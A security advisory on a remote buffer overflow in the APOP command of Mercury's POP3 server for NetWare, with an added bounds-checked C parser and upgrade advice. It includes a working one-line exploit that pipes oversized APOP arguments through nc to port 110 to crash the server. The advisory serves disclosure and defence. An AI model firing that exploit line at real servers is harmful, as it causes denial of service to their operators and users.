COMMAND

    Mercury

SYSTEMS AFFECTED

    Mercury for NetWare POP3

PROBLEM

    Przemyslaw Frasunek found the following.  All versions of the
    widely used POP3 server from the Mercury MTA package for NetWare
    are vulnerable to a remote buffer overflow that allows an attacker
    to crash the NetWare server:

        perl -e 'print "APOP " . "a"x2048 . " " . "a"x2048 . "\r\n"' | nc host 110

    Remote execution of malicious code is also theoretically possible.
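
    The request above sends two 2048-byte arguments to APOP.  The
    following is an added example, not Mercury code and not part of the
    original advisory: a bounds-checked APOP parser that rejects such a
    line before copying anything.  The name parse_apop, the buffer sizes
    and the choice of the RFC 2449 255-octet line limit are assumptions.

```c
#include <ctype.h>
#include <stddef.h>
#include <string.h>

#define POP3_MAX_LINE   255  /* RFC 2449: max command line, CRLF included */
#define APOP_DIGEST_LEN 32   /* RFC 1939: MD5 digest as 32 hex digits */

/* Hypothetical helper (not Mercury code): parse "APOP <name> <digest>\r\n"
 * from `len` received bytes into caller-supplied buffers.
 * Returns 0 on success, -1 if the line must be rejected. */
int parse_apop(const char *line, size_t len, char *name, size_t name_sz,
               char *digest, size_t digest_sz)
{
    static const char kw[] = "APOP";
    const char *p, *sp;
    size_t i, name_len, digest_len;

    /* Length and terminator checks come before any copy. */
    if (len < 7 || len > POP3_MAX_LINE) return -1;
    if (line[len - 2] != '\r' || line[len - 1] != '\n') return -1;
    len -= 2;

    /* Keyword is case-insensitive and followed by a single space. */
    for (i = 0; i < 4; i++)
        if (toupper((unsigned char)line[i]) != kw[i]) return -1;
    if (line[4] != ' ') return -1;
    p = line + 5;
    len -= 5;

    /* Split the two arguments at the first space. */
    sp = memchr(p, ' ', len);
    if (sp == NULL) return -1;
    name_len = (size_t)(sp - p);
    digest_len = len - name_len - 1;

    /* Each argument must fit its destination, terminator included. */
    if (name_len == 0 || name_len >= name_sz) return -1;
    if (digest_len != APOP_DIGEST_LEN || digest_sz <= APOP_DIGEST_LEN) return -1;
    for (i = 0; i < name_len; i++)
        if (!isgraph((unsigned char)p[i])) return -1;
    for (i = 0; i < digest_len; i++)
        if (!isxdigit((unsigned char)sp[1 + i])) return -1;

    memcpy(name, p, name_len);
    name[name_len] = '\0';
    memcpy(digest, sp + 1, digest_len);
    digest[digest_len] = '\0';
    return 0;
}
```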

SOLUTION

    The problem was fixed in Mercury 1.48, but no advisory was issued
    and older versions are still in wide use.  All Mercury-based
    servers should be updated immediately.

    However, it seems that Mercury 1.48 on NetWare 4.10 crashed.
    Mercury 1.48 on NetWare 4.11 didn't crash (then again, 4.10 is
    not supported anymore).